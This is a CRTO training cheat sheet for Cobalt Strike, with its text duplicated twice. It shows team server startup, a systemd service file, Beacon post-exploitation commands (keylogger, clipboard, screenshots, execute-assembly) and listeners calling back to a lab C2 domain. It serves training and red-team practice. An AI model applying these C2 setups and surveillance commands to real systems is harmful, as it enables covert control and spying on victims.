CRTO Cheat Sheet

Cobalt Strike

Team Server

From terminal

sudo ./teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile # Use TMUX

As a Service

sudo nano /etc/systemd/system/teamserver.service

[Unit]
Description=Cobalt Strike Team Server
After=network.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=always
RestartSec=1
User=root
WorkingDirectory=/home/attacker/cobaltstrike
ExecStart=/home/attacker/cobaltstrike/teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile

[Install]
WantedBy=multi-user.target

sudo systemctl daemon-reload
sudo systemctl status teamserver.service

sudo systemctl start teamserver.service
sudo systemctl stop teamserver.service

sudo systemctl enable teamserver.service
sudo systemctl disable teamserver.service

Beacon

# Basic
sleep <seconds> <jitter> # sleep 5 50
connect <target>
execute-assembly <path-tool> <params-tool> # Execute binary on remote Beacon
run netstat -anop tcp # View listening ports
jobs
jobkill <jib>

# Recon
net logons

clipboard
keylogger 
printscreen
screenshot
screenwatch

# DNS Beacon
checkin # Get metadata/info Beacon

Listeners

name	payload	host	port	beacons	profile
dns	windows/beacon_dns/reverse_dns_txt	pics.nickelviper.com	53	pics.nickelviper.com	default
http	windows/beacon_http/reverse_http	nickelviper.com	80	nickelviper.com	default
smb	windows/beacon_bind_pipe		TSVCPIPE-8ff80863-eb68-48ad-b397-34ae76d3577e (cambiar 4 últimos)
tcp	windows/beacon_bind_tcp		4444	0.0.0.0
tcp-local	windows/beacon_bind_tcp		4444	127.0.0.1

name

payload

host

port

bindto

beacons

profile

dns

windows/beacon_dns/reverse_dns_txt

pics.nickelviper.com

default

http

windows/beacon_http/reverse_http

nickelviper.com

default

smb

windows/beacon_bind_pipe

TSVCPIPE-8ff80863-eb68-48ad-b397-34ae76d3577e (cambiar 4 últimos)

tcp

windows/beacon_bind_tcp

4444

0.0.0.0

tcp-local

windows/beacon_bind_tcp

4444

127.0.0.1

PreviousTools NextPage

Last updated 9 months ago

CRTO Cheat Sheet

Cobalt Strike

Team Server

From terminal

sudo ./teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile # Use TMUX

As a Service

sudo nano /etc/systemd/system/teamserver.service

[Unit]
Description=Cobalt Strike Team Server
After=network.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=always
RestartSec=1
User=root
WorkingDirectory=/home/attacker/cobaltstrike
ExecStart=/home/attacker/cobaltstrike/teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile

[Install]
WantedBy=multi-user.target

sudo systemctl daemon-reload
sudo systemctl status teamserver.service

sudo systemctl start teamserver.service
sudo systemctl stop teamserver.service

sudo systemctl enable teamserver.service
sudo systemctl disable teamserver.service

Beacon

# Basic
sleep <seconds> <jitter> # sleep 5 50
connect <target>
execute-assembly <path-tool> <params-tool> # Execute binary on remote Beacon
run netstat -anop tcp # View listening ports
jobs
jobkill <jib>

# Recon
net logons

clipboard
keylogger 
printscreen
screenshot
screenwatch

# DNS Beacon
checkin # Get metadata/info Beacon

Listeners

name	payload	host	port	beacons	profile
dns	windows/beacon_dns/reverse_dns_txt	pics.nickelviper.com	53	pics.nickelviper.com	default
http	windows/beacon_http/reverse_http	nickelviper.com	80	nickelviper.com	default
smb	windows/beacon_bind_pipe		TSVCPIPE-8ff80863-eb68-48ad-b397-34ae76d3577e (cambiar 4 últimos)
tcp	windows/beacon_bind_tcp		4444	0.0.0.0
tcp-local	windows/beacon_bind_tcp		4444	127.0.0.1

name

payload

host

port

bindto

beacons

profile

dns

windows/beacon_dns/reverse_dns_txt

pics.nickelviper.com

default

http

windows/beacon_http/reverse_http

nickelviper.com

default

smb

windows/beacon_bind_pipe

TSVCPIPE-8ff80863-eb68-48ad-b397-34ae76d3577e (cambiar 4 últimos)

tcp

windows/beacon_bind_tcp

4444

0.0.0.0

tcp-local

windows/beacon_bind_tcp

4444

127.0.0.1

PreviousTools NextPage

Last updated 9 months ago